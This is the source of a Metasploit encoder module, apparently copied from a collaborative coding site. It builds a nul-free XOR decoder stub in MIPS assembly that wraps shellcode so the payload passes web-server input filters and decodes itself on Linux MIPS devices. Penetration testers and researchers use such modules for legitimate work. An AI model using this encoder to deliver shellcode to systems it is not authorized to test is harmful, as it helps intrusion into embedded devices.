Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasm'
7

8
class MetasploitModule < Msf::Encoder::Xor
9

10
  def initialize
11
    super(
12
      'Name'             => 'XOR Encoder',
13
      'Description'      => %q{
14
        Mips Web server exploit friendly xor encoder
15
      },
16
      'Author'           =>
17
        [   'Julien Tinnes <julien[at]cr0.org>',   # original shellcode
18
            'Pedro Ribeiro <[email protected]>',    # fix Linux >= 2.6.11 and toupper() compat
19
        ],
20
      'Arch'             => ARCH_MIPSLE,
21
      'License'          => MSF_LICENSE,
22
      'Decoder'          =>
23
        {
24
          'KeySize'   => 4,
25
          'BlockSize' => 4,
26
          'KeyPack'   => 'V',
27
        })
28
  end
29

30
  #
31
  # Returns the decoder stub that is adjusted for the size of the buffer
32
  # being encoded.
33
  #
34
  def decoder_stub(state)
35

36
    # add one xor operation for the key (see comment below)
37
    number_of_passes=state.buf.length/4+1
38
    raise EncodingError.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 10240
39
    raise EncodingError.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 0
40

41
    # 16-bits not (again, see below)
42
    reg_10 = (number_of_passes+1)^0xFFFF
43
    reg_5 = state.buf.length^0xFFFF
44
    decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:little), <<EOS).encoded.data
45
;
46
; MIPS nul-free xor decoder
47
;
48
; (C) 2006 Julien TINNES
49
; <julien at cr0.org>
50
;
51
; The first four bytes in encoded shellcode must be the xor key
52
; This means that you have to put the xor key right after
53
; this xor decoder
54
; This key will be considered part of the encoded shellcode
55
; by this decoder and will be xored, thus becoming 4NULs, meaning nop
56
;
57
; This is Linux-only because I use the cacheflush system call
58
;
59
; You can use shellforge to assemble this, but be sure to discard all
60
; the nul bytes at the end (everything after x01\\x4a\\x54\\x0c)
61
;
62
; change 2 bytes in the first instruction's opcode with the number of passes
63
; the number of passes is the number of xor operations to apply, which should be
64
; 1 (for the key) + the number of 4-bytes words you have in your shellcode
65
; you must encode ~(number_of_passes + 1) (to ensure that you're nul-free)
66

67

68
;.text
69
;.align	2
70
;.globl	main
71
;.ent	main
72
;.type		 main,@function
73

74
main:
75

76
li macro reg, imm
77
;	lui reg, ((imm) >> 16) & 0ffffh
78
;	ori reg, reg, (imm) & 0ffffh
79
  addiu reg, $0, imm		    ; sufficient if imm.abs <= 0x7fff
80
endm
81

82
  li(	$10, #{reg_10})		    ; load number of passes ^ 0xffff
83
  nor	$10, $10, $0		      ; put number of passes in $10
84

85
  li(	$11,-89)		          ; addend to calculated PC is 73
86
;.set noreorder
87
next:
88
  bltzal  $8, next
89
;.set reorder
90
  slti    $8, $0, 0x8282
91
  nor     $11, $11, $0	    ; addend in $9
92
  addu	$25, $31, $11		    ; $25 points to encoded shellcode +4
93
  addu	$16, $31, $11		    ; $16 too (used to set up the cacheflush() arg down below)
94

95
;	lui	$2, 0xDDDD     		    ; first part of the xor (old method)
96
  slti	$23, $0, 0x8282     ; store 0 in $23 (our counter)
97
;	ori	$17, $2, 0xDDDD 	    ; second part of the xor (old method)
98
  lw	$17, -4($25)		      ; load xor key in $17
99

100

101
  li(	$9, -5)
102
  nor	$9, $9, $0		        ; 4 in $9
103

104
  addi	$15, $9, -3		      ; 1 in $15
105
loop:
106
  lw	$8, -4($25)
107

108
  addu	$23, $23, $15		    ; increment counter
109
  xor	$3, $8, $17
110
  sltu	$30, $23, $10		    ; enough loops?
111
  sw	$3, -4($25)
112
  addi	$6, $9, -1		      ; 3 in $6 (for cacheflush)
113
  bne	$0, $30, loop
114
  addu	$25, $25, $9		    ; next instruction to decode :)
115

116

117
  addiu	$4, $16, -4         ; cacheflush() addr parameter
118
  li(      $10,#{reg_5})    ; cacheflush() nbytes parameter
119
  nor   $5, $10, $0         ; same as above
120
;   li      $6,3            ; $6 is set above, 3rd arg for cacheflush()
121

122
;	.set    noreorder
123
  li(     $2, 4147)         ; cacheflush
124
;   .ascii "\\x01JT\\x0c"   ; nul-free syscall
125
  syscall 0x52950
126
;	.set    reorder
127

128

129
; write last decoder opcode and decoded shellcode
130
;	li      $4,1              ; stdout
131
;	addi	$5, $16, -8
132
;	li      $6,40             ; how much to write
133
;	.set    noreorder
134
;	li      $2, 4004          ; write
135
;	syscall
136
;	.set    reorder
137

138

139
  nop				                ; encoded shellcoded must be here (xor key right here ;)
140
; $t9 (aka $25) points here
141

142
EOS
143
    # put the key at the end of the decoder
144
    state.decoder_key_offset = decoder.length - 4
145

146
    return decoder
147
  end
148
end
149

150